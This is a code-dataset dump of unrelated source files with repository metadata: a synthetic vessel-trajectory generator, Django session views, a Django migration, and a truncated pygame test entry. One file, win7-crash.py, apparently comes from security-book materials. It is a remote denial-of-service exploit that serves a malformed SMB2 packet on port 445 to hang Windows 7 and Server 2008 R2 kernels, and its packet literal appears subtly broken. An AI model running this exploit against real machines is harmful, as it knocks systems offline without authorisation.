tutorial/code/dependencies/BuildSyntheticTrajectoriesOfVariableOrders.py
|
msaebi1993/hon
|
2c89ad43911707e3185f18ebe8686d353aa50c83
|
[
"MIT"
] | 48
|
2016-05-31T03:36:04.000Z
|
2022-01-18T15:29:10.000Z
|
tutorial/code/dependencies/BuildSyntheticTrajectoriesOfVariableOrders.py
|
msaebi1993/hon
|
2c89ad43911707e3185f18ebe8686d353aa50c83
|
[
"MIT"
] | 8
|
2018-08-28T19:57:39.000Z
|
2021-04-22T15:58:20.000Z
|
tutorial/code/dependencies/BuildSyntheticTrajectoriesOfVariableOrders.py
|
msaebi1993/hon
|
2c89ad43911707e3185f18ebe8686d353aa50c83
|
[
"MIT"
] | 14
|
2016-11-07T17:01:32.000Z
|
2021-05-21T08:46:55.000Z
|
import random
import concurrent.futures
def NextStep(port):
##random.seed()
#up = (port - 10) % 100
down = (port + 10) % 100
#left = (port - 1) % 10 + 10 * int(port / 10)
right = (port + 1) % 10 + 10 * int(port / 10)
return random.choice([down, right])
def BiasedNextStep(port):
#random.seed()
#up = (port - 10) % 100
down = (port + 10) % 100
#left = (port - 1) % 10 + 10 * int(port / 10)
right = (port + 1) % 10 + 10 * int(port / 10)
rnd = random.random()
if rnd < .9:
return right
else:
return down
def AltBiasedNextStep(port):
#random.seed()
# up = (port - 10) % 100
down = (port + 10) % 100
# left = (port - 1) % 10 + 10 * int(port / 10)
right = (port + 1) % 10 + 10 * int(port / 10)
rnd = random.random()
if rnd < .1:
return right
else:
return down
def MixedBiasedNextStep(port):
#random.seed()
# up = (port - 10) % 100
down = (port + 10) % 100
# left = (port - 1) % 10 + 10 * int(port / 10)
right = (port + 1) % 10 + 10 * int(port / 10)
rnd = random.random()
if rnd < 110/300:
return right
else:
return down
def AltMixedBiasedNextStep(port):
#random.seed()
# up = (port - 10) % 100
down = (port + 10) % 100
# left = (port - 1) % 10 + 10 * int(port / 10)
right = (port + 1) % 10 + 10 * int(port / 10)
rnd = random.random()
if rnd < 190/300:
return right
else:
return down
def WriteTrajectories(trajectories, iteration, NetType):
StrIteration = str(iteration)
while len(StrIteration) < 4:
StrIteration = '0' + StrIteration
print(StrIteration, NetType)
with open(OutputFolder + StrIteration + '_' + NetType + '.csv', 'w') as f:
vid = 1
for trajectory in trajectories:
f.write(str(vid) + ' ' + ' '.join(map(str, trajectory)) + '\n')
vid += 1
# normal
def SynthesizeNormal(NetworkPrefixCounter):
trajectories = []
for vessel in range(vessels):
trajectory = []
for step in range(steps):
###random.seed()
if len(trajectory) == 0:
port = random.randint(0, 99)
else:
port = NextStep(trajectory[-1])
trajectory.append(port)
trajectories.append(trajectory)
WriteTrajectories(trajectories, NetworkPrefixCounter, 'normal')
# add first order
def SynthesizeAddFirstOrder(NetworkPrefixCounter):
trajectories = []
for vessel in range(vessels):
trajectory = []
for step in range(steps):
#random.seed()
if len(trajectory) == 0:
port = random.randint(0, 99)
else:
prev = trajectory[-1]
if prev in [0, 3, 6]:
port = BiasedNextStep(prev)
else:
port = NextStep(prev)
trajectory.append(port)
trajectories.append(trajectory)
WriteTrajectories(trajectories, NetworkPrefixCounter, 'AddFirstOrder')
# modify first order
def SynthesizeModifyFirstOrder(NetworkPrefixCounter):
trajectories = []
for vessel in range(vessels):
trajectory = []
for step in range(steps):
#random.seed()
if len(trajectory) == 0:
port = random.randint(0, 99)
else:
prev = trajectory[-1]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
port = NextStep(prev)
trajectory.append(port)
trajectories.append(trajectory)
WriteTrajectories(trajectories, NetworkPrefixCounter, 'ModifyFirstOrder')
# add second order
def SynthesizeAddSecondOrder(NetworkPrefixCounter):
trajectories = []
for vessel in range(vessels):
trajectory = []
for step in range(steps):
#random.seed()
if len(trajectory) == 0:
port = random.randint(0, 99)
else:
if len(trajectory) == 1:
prev = trajectory[-1]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
port = NextStep(prev)
else:
prev = trajectory[-1]
pprev = trajectory[-2]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
if (pprev, prev) in [(27, 28)]:
port = BiasedNextStep(prev)
else:
port = NextStep(prev)
trajectory.append(port)
trajectories.append(trajectory)
WriteTrajectories(trajectories, NetworkPrefixCounter, 'AddSecondOrder')
# Add sophisticated second order
def SynthesizeAddSophisticatedSecondOrder(NetworkPrefixCounter):
trajectories = []
for vessel in range(vessels):
trajectory = []
for step in range(steps):
#random.seed()
if len(trajectory) == 0:
port = random.randint(0, 99)
else:
if len(trajectory) == 1:
prev = trajectory[-1]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
port = NextStep(prev)
else:
prev = trajectory[-1]
pprev = trajectory[-2]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
if (pprev, prev) in [(27, 28)]:
port = BiasedNextStep(prev)
elif (pprev, prev) in [(30, 31), (34, 35)]:
port = BiasedNextStep(prev)
elif (pprev, prev) in [(21, 31), (25, 35)]:
port = AltBiasedNextStep(prev)
else:
port = NextStep(prev)
trajectory.append(port)
trajectories.append(trajectory)
WriteTrajectories(trajectories, NetworkPrefixCounter, 'AddSophisticatedSecondOrder')
# modify second order
def SynthesizeModifySecondOrder(NetworkPrefixCounter):
trajectories = []
for vessel in range(vessels):
trajectory = []
for step in range(steps):
#random.seed()
if len(trajectory) == 0:
port = random.randint(0, 99)
else:
if len(trajectory) == 1:
prev = trajectory[-1]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
port = NextStep(prev)
else:
prev = trajectory[-1]
pprev = trajectory[-2]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
if (pprev, prev) in [(27, 28)]:
port = BiasedNextStep(prev)
elif (pprev, prev) in [(30, 31), (34, 35)]:
port = AltBiasedNextStep(prev)
elif (pprev, prev) in [(21, 31), (25, 35)]:
port = BiasedNextStep(prev)
else:
port = NextStep(prev)
trajectory.append(port)
trajectories.append(trajectory)
WriteTrajectories(trajectories, NetworkPrefixCounter, 'ModifySophisticatedSecondOrder')
# add third order
def SynthesizeAddThirdOrder(NetworkPrefixCounter):
trajectories = []
for vessel in range(vessels):
trajectory = []
for step in range(steps):
#random.seed()
if len(trajectory) == 0:
port = random.randint(0, 99)
else:
if len(trajectory) == 1:
prev = trajectory[-1]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
port = NextStep(prev)
else:
if len(trajectory) == 2:
prev = trajectory[-1]
pprev = trajectory[-2]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
if (pprev, prev) in [(27, 28)]:
port = BiasedNextStep(prev)
elif (pprev, prev) in [(30, 31), (34, 35)]:
port = AltBiasedNextStep(prev)
elif (pprev, prev) in [(21, 31), (25, 35)]:
port = BiasedNextStep(prev)
else:
port = NextStep(prev)
else:
prev = trajectory[-1]
pprev = trajectory[-2]
ppprev = trajectory[-3]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
if (pprev, prev) in [(27, 28)]:
port = BiasedNextStep(prev)
elif (pprev, prev) in [(30, 31), (34, 35)]:
port = AltBiasedNextStep(prev)
elif (pprev, prev) in [(21, 31), (25, 35)]:
port = BiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(61, 71, 81)]:
port = BiasedNextStep(prev)
else:
port = NextStep(prev)
trajectory.append(port)
trajectories.append(trajectory)
WriteTrajectories(trajectories, NetworkPrefixCounter, 'AddThirdOrder')
# add sophisticated third order
def SynthesizeAddSophisticatedThirdOrder(NetworkPrefixCounter):
trajectories = []
for vessel in range(vessels):
trajectory = []
for step in range(steps):
#random.seed()
if len(trajectory) == 0:
port = random.randint(0, 99)
else:
if len(trajectory) == 1:
prev = trajectory[-1]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
port = NextStep(prev)
else:
if len(trajectory) == 2:
prev = trajectory[-1]
pprev = trajectory[-2]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
if (pprev, prev) in [(27, 28)]:
port = BiasedNextStep(prev)
elif (pprev, prev) in [(30, 31), (34, 35)]:
port = AltBiasedNextStep(prev)
elif (pprev, prev) in [(21, 31), (25, 35)]:
port = BiasedNextStep(prev)
else:
port = NextStep(prev)
else:
prev = trajectory[-1]
pprev = trajectory[-2]
ppprev = trajectory[-3]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
if (pprev, prev) in [(27, 28)]:
port = BiasedNextStep(prev)
elif (pprev, prev) in [(30, 31), (34, 35)]:
port = AltBiasedNextStep(prev)
elif (pprev, prev) in [(21, 31), (25, 35)]:
port = BiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(61, 71, 81)]:
port = BiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(73, 74, 84), (76, 77, 87)]:
port = BiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(64, 74, 84), (67, 77, 87)]:
port = AltBiasedNextStep(prev)
else:
port = NextStep(prev)
trajectory.append(port)
trajectories.append(trajectory)
WriteTrajectories(trajectories, NetworkPrefixCounter, 'AddSophisticatedThirdOrder')
# modify third order
def SynthesizeModifyThirdOrder(NetworkPrefixCounter):
trajectories = []
for vessel in range(vessels):
trajectory = []
for step in range(steps):
#random.seed()
if len(trajectory) == 0:
port = random.randint(0, 99)
else:
if len(trajectory) == 1:
prev = trajectory[-1]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
port = NextStep(prev)
else:
if len(trajectory) == 2:
prev = trajectory[-1]
pprev = trajectory[-2]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
if (pprev, prev) in [(27, 28)]:
port = BiasedNextStep(prev)
elif (pprev, prev) in [(30, 31), (34, 35)]:
port = AltBiasedNextStep(prev)
elif (pprev, prev) in [(21, 31), (25, 35)]:
port = BiasedNextStep(prev)
else:
port = NextStep(prev)
else:
prev = trajectory[-1]
pprev = trajectory[-2]
ppprev = trajectory[-3]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
if (pprev, prev) in [(27, 28)]:
port = BiasedNextStep(prev)
elif (pprev, prev) in [(30, 31), (34, 35)]:
port = AltBiasedNextStep(prev)
elif (pprev, prev) in [(21, 31), (25, 35)]:
port = BiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(61, 71, 81)]:
port = BiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(73, 74, 84), (76, 77, 87)]:
port = AltBiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(64, 74, 84), (67, 77, 87)]:
port = BiasedNextStep(prev)
else:
port = NextStep(prev)
trajectory.append(port)
trajectories.append(trajectory)
WriteTrajectories(trajectories, NetworkPrefixCounter, 'ModifyThirdOrder')
# add mixed first and third order
def SynthesizeAddMixedOrder(NetworkPrefixCounter):
trajectories = []
for vessel in range(vessels):
trajectory = []
for step in range(steps):
#random.seed()
if len(trajectory) == 0:
port = random.randint(0, 99)
else:
if len(trajectory) == 1:
prev = trajectory[-1]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
port = NextStep(prev)
else:
if len(trajectory) == 2:
prev = trajectory[-1]
pprev = trajectory[-2]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
if (pprev, prev) in [(27, 28)]:
port = BiasedNextStep(prev)
elif (pprev, prev) in [(30, 31), (34, 35)]:
port = AltBiasedNextStep(prev)
elif (pprev, prev) in [(21, 31), (25, 35)]:
port = BiasedNextStep(prev)
else:
port = NextStep(prev)
else:
prev = trajectory[-1]
pprev = trajectory[-2]
ppprev = trajectory[-3]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
if (pprev, prev) in [(27, 28)]:
port = BiasedNextStep(prev)
elif (pprev, prev) in [(30, 31), (34, 35)]:
port = AltBiasedNextStep(prev)
elif (pprev, prev) in [(21, 31), (25, 35)]:
port = BiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(61, 71, 81)]:
port = BiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(73, 74, 84), (76, 77, 87)]:
port = AltBiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(64, 74, 84), (67, 77, 87)]:
port = BiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(39, 49, 59)]:
port = BiasedNextStep(prev)
elif prev == 59:
port = MixedBiasedNextStep(prev)
else:
port = NextStep(prev)
trajectory.append(port)
trajectories.append(trajectory)
WriteTrajectories(trajectories, NetworkPrefixCounter, 'AddMixedOrder')
# modify mixed first and third order
def SynthesizeModifyMixedOrder(NetworkPrefixCounter):
trajectories = []
for vessel in range(vessels):
trajectory = []
for step in range(steps):
#random.seed()
if len(trajectory) == 0:
port = random.randint(0, 99)
else:
if len(trajectory) == 1:
prev = trajectory[-1]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
port = NextStep(prev)
else:
if len(trajectory) == 2:
prev = trajectory[-1]
pprev = trajectory[-2]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
if (pprev, prev) in [(27, 28)]:
port = BiasedNextStep(prev)
elif (pprev, prev) in [(30, 31), (34, 35)]:
port = AltBiasedNextStep(prev)
elif (pprev, prev) in [(21, 31), (25, 35)]:
port = BiasedNextStep(prev)
else:
port = NextStep(prev)
else:
prev = trajectory[-1]
pprev = trajectory[-2]
ppprev = trajectory[-3]
if prev in [0, 3, 6]:
port = AltBiasedNextStep(prev)
else:
if (pprev, prev) in [(27, 28)]:
port = BiasedNextStep(prev)
elif (pprev, prev) in [(30, 31), (34, 35)]:
port = AltBiasedNextStep(prev)
elif (pprev, prev) in [(21, 31), (25, 35)]:
port = BiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(61, 71, 81)]:
port = BiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(73, 74, 84), (76, 77, 87)]:
port = AltBiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(64, 74, 84), (67, 77, 87)]:
port = BiasedNextStep(prev)
elif (ppprev, pprev, prev) in [(39, 49, 59)]:
port = AltBiasedNextStep(prev)
elif prev == 59:
port = AltMixedBiasedNextStep(prev)
else:
port = NextStep(prev)
trajectory.append(port)
trajectories.append(trajectory)
WriteTrajectories(trajectories, NetworkPrefixCounter, 'ModifyMixedOrder')
################ main
NetworkPrefixCounter = 0
OutputFolder = '../data/'
iterations = 10
vessels = 10000
steps = 100
if __name__ == '__main__':
# every node has 40000*100/100=40000 movements on a 10x10 grid
random.seed()
with concurrent.futures.ProcessPoolExecutor() as executor:
executor.map(SynthesizeNormal, range(NetworkPrefixCounter, NetworkPrefixCounter + iterations))
NetworkPrefixCounter += iterations
with concurrent.futures.ProcessPoolExecutor() as executor:
executor.map(SynthesizeAddFirstOrder, range(NetworkPrefixCounter, NetworkPrefixCounter + iterations))
NetworkPrefixCounter += iterations
with concurrent.futures.ProcessPoolExecutor() as executor:
executor.map(SynthesizeModifyFirstOrder, range(NetworkPrefixCounter, NetworkPrefixCounter + iterations))
NetworkPrefixCounter += iterations
with concurrent.futures.ProcessPoolExecutor() as executor:
executor.map(SynthesizeAddSecondOrder, range(NetworkPrefixCounter, NetworkPrefixCounter + iterations))
NetworkPrefixCounter += iterations
with concurrent.futures.ProcessPoolExecutor() as executor:
executor.map(SynthesizeAddSophisticatedSecondOrder, range(NetworkPrefixCounter, NetworkPrefixCounter + iterations))
NetworkPrefixCounter += iterations
with concurrent.futures.ProcessPoolExecutor() as executor:
executor.map(SynthesizeModifySecondOrder,
range(NetworkPrefixCounter, NetworkPrefixCounter + iterations))
NetworkPrefixCounter += iterations
with concurrent.futures.ProcessPoolExecutor() as executor:
executor.map(SynthesizeAddThirdOrder,
range(NetworkPrefixCounter, NetworkPrefixCounter + iterations))
NetworkPrefixCounter += iterations
with concurrent.futures.ProcessPoolExecutor() as executor:
executor.map(SynthesizeAddSophisticatedThirdOrder,
range(NetworkPrefixCounter, NetworkPrefixCounter + iterations))
NetworkPrefixCounter += iterations
with concurrent.futures.ProcessPoolExecutor() as executor:
executor.map(SynthesizeModifyThirdOrder,
range(NetworkPrefixCounter, NetworkPrefixCounter + iterations))
NetworkPrefixCounter += iterations
with concurrent.futures.ProcessPoolExecutor() as executor:
executor.map(SynthesizeAddMixedOrder,
range(NetworkPrefixCounter, NetworkPrefixCounter + iterations))
NetworkPrefixCounter += iterations
with concurrent.futures.ProcessPoolExecutor() as executor:
executor.map(SynthesizeModifyMixedOrder,
range(NetworkPrefixCounter, NetworkPrefixCounter + iterations))
NetworkPrefixCounter += iterations
| 40.554649
| 124
| 0.445535
| 1,970
| 24,860
| 5.617767
| 0.071066
| 0.040661
| 0.051685
| 0.061083
| 0.855968
| 0.852715
| 0.835276
| 0.828409
| 0.822897
| 0.814132
| 0
| 0.054004
| 0.461464
| 24,860
| 612
| 125
| 40.620915
| 0.772632
| 0.034272
| 0
| 0.868952
| 0
| 0
| 0.009298
| 0.003556
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034274
| false
| 0
| 0.004032
| 0
| 0.056452
| 0.002016
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a52f69746f06d824c697bf2fe0383588ed5f0fd
| 1,436
|
py
|
Python
|
books_and_notes/professional_courses/Security/sources/extra_books/0day安全:软件漏洞分析技术第二版光盘资料/21探索ring0/shineast收集的内核漏洞/[2009-11-11][Microsoft][SMB2][nt][远程拒绝服务内核漏洞][36989]/win7-crash.py
|
gxw1/review_the_national_post-graduate_entrance_examination
|
8812779a7a4ce185a531d120562d5194b697c0c9
|
[
"MIT"
] | 640
|
2019-03-30T11:32:43.000Z
|
2022-03-31T14:05:18.000Z
|
books_and_notes/professional_courses/Security/sources/extra_books/0day安全:软件漏洞分析技术第二版光盘资料/21探索ring0/shineast收集的内核漏洞/[2009-11-11][Microsoft][SMB2][nt][远程拒绝服务内核漏洞][36989]/win7-crash.py
|
yyzVegst/review_the_national_post-graduate_entrance_examination
|
8812779a7a4ce185a531d120562d5194b697c0c9
|
[
"MIT"
] | 6
|
2019-07-22T01:57:24.000Z
|
2022-01-20T15:03:16.000Z
|
books_and_notes/professional_courses/Security/sources/extra_books/0day安全:软件漏洞分析技术第二版光盘资料/21探索ring0/shineast收集的内核漏洞/[2009-11-11][Microsoft][SMB2][nt][远程拒绝服务内核漏洞][36989]/win7-crash.py
|
yyzVegst/review_the_national_post-graduate_entrance_examination
|
8812779a7a4ce185a531d120562d5194b697c0c9
|
[
"MIT"
] | 212
|
2019-04-10T02:31:50.000Z
|
2022-03-30T02:32:47.000Z
|
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly crash
import SocketServer
packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()
| 41.028571
| 104
| 0.690808
| 257
| 1,436
| 3.836576
| 0.486381
| 0.395538
| 0.529412
| 0.63286
| 0.228195
| 0.228195
| 0.22211
| 0.209939
| 0.209939
| 0.143002
| 0
| 0.248397
| 0.130919
| 1,436
| 34
| 105
| 42.235294
| 0.541667
| 0.255571
| 0
| 0.1
| 0
| 0.5
| 0.634241
| 0.614786
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.05
| null | null | 0.05
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6a5604f813557e58c05439d1d837d0c1093c86ef
| 3,439
|
py
|
Python
|
contentsummary/views.py
|
Bobstin/itcsummary
|
259d8f64e415a1c7cbc926752c717e307c09953f
|
[
"MIT"
] | null | null | null |
contentsummary/views.py
|
Bobstin/itcsummary
|
259d8f64e415a1c7cbc926752c717e307c09953f
|
[
"MIT"
] | 5
|
2021-02-27T13:23:58.000Z
|
2021-09-22T17:39:19.000Z
|
contentsummary/views.py
|
Bobstin/itcsummary
|
259d8f64e415a1c7cbc926752c717e307c09953f
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
import pdb
from .models import Session, Quote, KeyTakeaway, Speech
# Create your views here.
def example(request):
session = Session.objects.all().order_by('number')[0]
session = sessioninfo(session)
context = {'session': session}
return render(request, 'contentsummary/example.html', context)
def nextSession(request, priornumber):
nextnumber = int(priornumber) + 1
session = Session.objects.get(number=nextnumber)
session = sessioninfo(session)
context = {'session': session}
return render(request, 'contentsummary/session.html', context)
def singleSession(request, session_number):
# pdb.set_trace()
session = Session.objects.get(number=session_number)
sessions = [{'session': session,
'quotes': Quote.objects.filter(session=session),
'keytakeaways': KeyTakeaway.objects.filter(session=session),
'speakers': Speech.objects.filter(session=session),
}]
context = {'sessions': sessions}
return render(request, 'contentsummary/all_sessions.html',context)
def allSessions(request):
db_sessions = Session.objects.all()
sessions = [
{
'session':session,
'quotes':Quote.objects.filter(session=session),
'keytakeaways':KeyTakeaway.objects.filter(session=session),
'speakers':Speech.objects.filter(session=session),
} for session in db_sessions
]
context = {'sessions':sessions}
return render(request,'contentsummary/all_sessions_no_resize.html',context)
def allSessionspt1(request):
db_sessions = Session.objects.filter(number__lte=26)
sessions = [
{
'session':session,
'quotes':Quote.objects.filter(session=session),
'keytakeaways':KeyTakeaway.objects.filter(session=session),
'speakers':Speech.objects.filter(session=session),
} for session in db_sessions
]
db_sessions = Session.objects.filter(number__gte=27)
sessions += [
{
'session':session,
'quotes':Quote.objects.filter(session=session),
'keytakeaways':KeyTakeaway.objects.filter(session=session),
'speakers':Speech.objects.filter(session=session),
} for session in db_sessions
]
context = {'sessions':sessions}
return render(request,'contentsummary/all_sessions_no_resize.html',context)
def allSessionspt2(request):
db_sessions = Session.objects.filter(number__gte=27)
sessions = [
{
'session':session,
'quotes':Quote.objects.filter(session=session),
'keytakeaways':KeyTakeaway.objects.filter(session=session),
'speakers':Speech.objects.filter(session=session),
} for session in db_sessions
]
db_sessions = Session.objects.filter(number__lte=26)
sessions += [
{
'session':session,
'quotes':Quote.objects.filter(session=session),
'keytakeaways':KeyTakeaway.objects.filter(session=session),
'speakers':Speech.objects.filter(session=session),
} for session in db_sessions
]
context = {'sessions': sessions}
return render(request, 'contentsummary/all_sessions_no_resize.html', context)
def sessioninfo(session):
sessioninfo = {'session': session,
'quotes': Quote.objects.filter(session=session),
'keytakeaways': KeyTakeaway.objects.filter(session=session),
'speakers': Speech.objects.filter(session=session), }
return sessioninfo
| 29.393162
| 81
| 0.690899
| 357
| 3,439
| 6.565826
| 0.154062
| 0.197099
| 0.179181
| 0.241894
| 0.819113
| 0.78029
| 0.78029
| 0.774317
| 0.774317
| 0.745734
| 0
| 0.004272
| 0.183193
| 3,439
| 117
| 82
| 29.393162
| 0.830189
| 0.011341
| 0
| 0.60241
| 0
| 0
| 0.145674
| 0.06239
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084337
| false
| 0
| 0.036145
| 0
| 0.204819
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a5e4266d43ef9d7e6ea49c05c79d50e85ba7861
| 4,685
|
py
|
Python
|
pixelpuncher/player/migrations/0007_auto_20151230_2157.py
|
ej2/pixelpuncher
|
8dd31090252c00772932c78ea21438d1e979f722
|
[
"BSD-3-Clause"
] | null | null | null |
pixelpuncher/player/migrations/0007_auto_20151230_2157.py
|
ej2/pixelpuncher
|
8dd31090252c00772932c78ea21438d1e979f722
|
[
"BSD-3-Clause"
] | null | null | null |
pixelpuncher/player/migrations/0007_auto_20151230_2157.py
|
ej2/pixelpuncher
|
8dd31090252c00772932c78ea21438d1e979f722
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-30 21:57
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('player', '0006_auto_20151228_0324'),
]
operations = [
migrations.RemoveField(
model_name='skill',
name='critial_percentage',
),
migrations.RemoveField(
model_name='skill',
name='fail_percentage',
),
migrations.RemoveField(
model_name='skill',
name='maximum_damage',
),
migrations.RemoveField(
model_name='skill',
name='minimum_damage',
),
migrations.AddField(
model_name='playerskill',
name='bonus',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='playerskill',
name='critical_multipler',
field=models.DecimalField(decimal_places=2, default=2.0, max_digits=4),
),
migrations.AddField(
model_name='playerskill',
name='critical_percentage',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='playerskill',
name='dice_sides',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='playerskill',
name='energy_cost',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='playerskill',
name='hit_percentage',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='playerskill',
name='number_of_dice',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='skill',
name='bonus',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='skill',
name='critical_multipler',
field=models.DecimalField(decimal_places=2, default=2.0, max_digits=4),
),
migrations.AddField(
model_name='skill',
name='critical_percentage',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='skill',
name='dice_sides',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='skill',
name='gain_frequency',
field=models.IntegerField(default=1),
),
migrations.AddField(
model_name='skill',
name='gained_critical',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='skill',
name='gained_critical_multipler',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='skill',
name='gained_energy_cost',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='skill',
name='gained_hit',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='skill',
name='hit_percentage',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='skill',
name='number_of_dice',
field=models.IntegerField(default=1),
),
migrations.AddField(
model_name='skill',
name='skill_type',
field=models.CharField(choices=[(b'ATTK', b'Attack'), (b'SPCL', b'Special'), (b'HEAL', b'Heal')], default='ATTK', max_length=4),
preserve_default=False,
),
migrations.AddField(
model_name='skill',
name='special_type',
field=models.CharField(blank=True, choices=[(b'energygain', b'Energy Gain'), (b'healthgain', b'Health Gain')], max_length=12, null=True),
),
migrations.AddField(
model_name='skill',
name='special_value_1',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='skill',
name='special_value_2',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='skill',
name='special_value_3',
field=models.IntegerField(default=0),
),
]
| 31.655405
| 149
| 0.542369
| 421
| 4,685
| 5.859857
| 0.206651
| 0.0985
| 0.21443
| 0.251723
| 0.809891
| 0.797325
| 0.750304
| 0.686664
| 0.648561
| 0.648561
| 0
| 0.020625
| 0.337673
| 4,685
| 147
| 150
| 31.870748
| 0.774412
| 0.013874
| 0
| 0.814286
| 1
| 0
| 0.143383
| 0.010396
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014286
| 0
| 0.035714
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6a648cf402e813c9224fe9d852d33a416e0fc027
| 77,060
|
py
|
Python
|
PyGame/.venv/Lib/site-packages/pygame/tests/math_test.py
|
esserafael/PythonStuff
|
97900e48f989b64ccde02f5d676f7f823ec0eed7
|
[
"MIT"
] | 1
|
2020-08-03T00:19:05.000Z
|
2020-08-03T00:19:05.000Z
|
PyGame/.venv/Lib/site-packages/pygame/tests/math_test.py
|
